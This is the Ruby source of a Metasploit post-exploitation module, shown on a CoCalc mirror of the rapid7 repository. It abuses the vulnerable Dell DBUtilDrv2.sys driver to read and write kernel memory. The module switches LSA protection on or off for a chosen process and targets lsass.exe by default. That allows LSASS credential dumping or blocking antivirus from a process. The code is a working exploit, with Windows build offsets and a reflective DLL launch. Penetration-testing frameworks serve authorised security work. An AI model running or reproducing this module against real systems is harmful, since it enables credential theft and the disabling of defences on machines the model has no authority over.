CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/manage/dell_memory_protect.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  Rank = ManualRanking

8


9
  include Msf::Exploit::Local::WindowsKernel

10
  include Msf::Post::File

11
  include Msf::Post::Process

12
  include Msf::Post::Windows::Priv

13
  include Msf::Post::Windows::Process

14
  include Msf::Post::Windows::ReflectiveDLLInjection

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'Dell DBUtilDrv2.sys Memory Protection Modifier',

21
        'Description' => %q{

22
          The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a write-what-where condition

23
          that allows an attacker to read and write arbitrary kernel-mode memory. This module

24
          installs the provided driver, enables or disables LSA protection on the provided

25
          PID, and then removes the driver. This would allow, for example, dumping LSASS memory

26
          even when secureboot is enabled or preventing antivirus from accessing the memory of

27
          a chosen PID.

28


29
          The affected drivers are not distributed with Metasploit. You will truly need to

30
          Bring Your Own (Dell) Driver.

31
        },

32
        'License' => MSF_LICENSE,

33
        'Author' => [

34
          'SentinelLabs', # Vulnerability discovery in original Dell driver (dbutil_2_3.sys)

35
          'Kasif Dekel',  # (from SentinelLabs) blog with detailed analysis

36
          'Red Cursor',   # Authors of PPLKiller

37
          'Jacob Baines'  # first reference of incomplete patch, poc, & metasploit module

38
        ],

39
        'Platform' => 'win',

40
        'SessionTypes' => [ 'meterpreter' ],

41
        'References' => [

42
          [ 'URL', 'https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/'],

43
          [ 'URL', 'https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection'],

44
          [ 'URL', 'https://itm4n.github.io/lsass-runasppl/'],

45
          [ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ],

46
          [ 'URL', 'https://attackerkb.com/assessments/12d7b263-3684-4442-812e-dc30b93def93'],

47
          [ 'URL', 'https://github.com/RedCursorSecurityConsulting/PPLKiller'],

48
          [ 'URL', 'https://github.com/jbaines-r7/dellicious' ]

49
        ],

50
        'Notes' => {

51
          'Reliability' => [ ],

52
          'Stability' => [ CRASH_OS_RESTARTS ],

53
          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]

54
        }

55
      )

56
    )

57
    register_options([

58
      OptString.new('DRIVER_PATH', [true, 'The path containing the driver inf, cat, and sys (and coinstaller)', '']),

59
      OptInt.new('PID', [true, 'The targetted process. If set to 0 the module will automatically target lsass.exe', '0']),

60
      OptBool.new('ENABLE_MEM_PROTECT', [true, 'Enable or disable memory protection', 'false'])

61
    ])

62
  end

63


64
  def get_eproc_offsets

65
    unless session.platform == 'windows'

66
      print_status("Target is not Windows. Found #{session.platform}")

67
      return nil

68
    end

69


70
    version = get_version_info

71
    vprint_status("Windows Build Number = #{version.build_number}")

72


73
    # UniqueProcessIdOffset, ActiveProcessLinksOffset, SignatureLevelOffset

74
    offsets = {

75
      Msf::WindowsVersion::Win10_1507 => [ 0x02e8, 0x02f0, 0x06a8 ], # Gold

76
      Msf::WindowsVersion::Win10_1511 => [ 0x02e8, 0x02f0, 0x06b0 ], # 2015 update

77
      Msf::WindowsVersion::Win10_1607 => [ 0x02e8, 0x02f0, 0x06c8 ], # 2016 update

78
      Msf::WindowsVersion::Win10_1703 => [ 0x02e0, 0x02e8, 0x06c8 ], # April 2017 update

79
      Msf::WindowsVersion::Win10_1709 => [ 0x02e0, 0x02e8, 0x06c8 ], # Fall 2017 update

80
      Msf::WindowsVersion::Win10_1803 => [ 0x02e0, 0x02e8, 0x06c8 ], # April 2018 update

81
      Msf::WindowsVersion::Win10_1809 => [ 0x02e0, 0x02e8, 0x06c8 ], # October 2018 update

82
      Msf::WindowsVersion::Win10_1903 => [ 0x02e8, 0x02f0, 0x06f8 ], # May 2019 update

83
      Msf::WindowsVersion::Win10_1909 => [ 0x02e8, 0x02f0, 0x06f8 ], # November 2019 update

84
      Msf::WindowsVersion::Win10_2004 => [ 0x0440, 0x0448, 0x0878 ], # May 2020 update

85
      Msf::WindowsVersion::Win10_20H2 => [ 0x0440, 0x0448, 0x0878 ], # October 2020 update

86
      Msf::WindowsVersion::Win10_21H1 => [ 0x0440, 0x0448, 0x0878 ], # May 2021 update

87
      Msf::WindowsVersion::Win10_21H2 => [ 0x0440, 0x0448, 0x0878 ], # October 2021 update

88
      Msf::WindowsVersion::Win11_21H2 => [ 0x0440, 0x0448, 0x0878 ]  # Win 11 June/September 2021

89
    }

90


91
    unless offsets.key?(version.build_number)

92
      print_status("Unknown offsets for Windows build #{version.build_number}")

93
      return nil

94
    end

95


96
    return offsets[version.build_number]

97
  end

98


99
  def run

100
    unless is_system?

101
      fail_with(Failure::None, 'Elevated session is required')

102
    end

103


104
    offsets = get_eproc_offsets

105
    if offsets.nil?

106
      fail_with(Failure::NoTarget, 'Unsupported target')

107
    end

108


109
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86

110
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')

111
    end

112


113
    unless datastore['DRIVER_PATH'].include? '\\'

114
      fail_with(Failure::BadConfig, "The driver path must be a file path. User provided: #{datastore['DRIVER_PATH']}")

115
    end

116


117
    # If the user doesn't select a PID select lsass.exe for them

118
    target_pid = datastore['PID']

119
    if target_pid == 0

120
      target_pid = pidof('lsass.exe').first

121
      print_status("Set PID option #{target_pid} for lsass.exe")

122
    end

123


124
    params = datastore['DRIVER_PATH']

125
    params += ','

126
    params += target_pid.to_s

127
    params += ','

128
    params += (datastore['ENABLE_MEM_PROTECT'] ? '1' : '0')

129
    params += ','

130
    params += offsets[0].to_s # UniqueProcessIdOffset

131
    params += ','

132
    params += offsets[1].to_s # ActiveProcessLinksOffset

133
    params += ','

134
    params += offsets[2].to_s # SignatureLevelOffset

135


136
    execute_dll(::File.join(Msf::Config.data_directory, 'exploits', 'dell_protect', 'dell_protect.x64.dll'), params)

137


138
    print_good('Exploit finished')

139
  end

140
end

141


142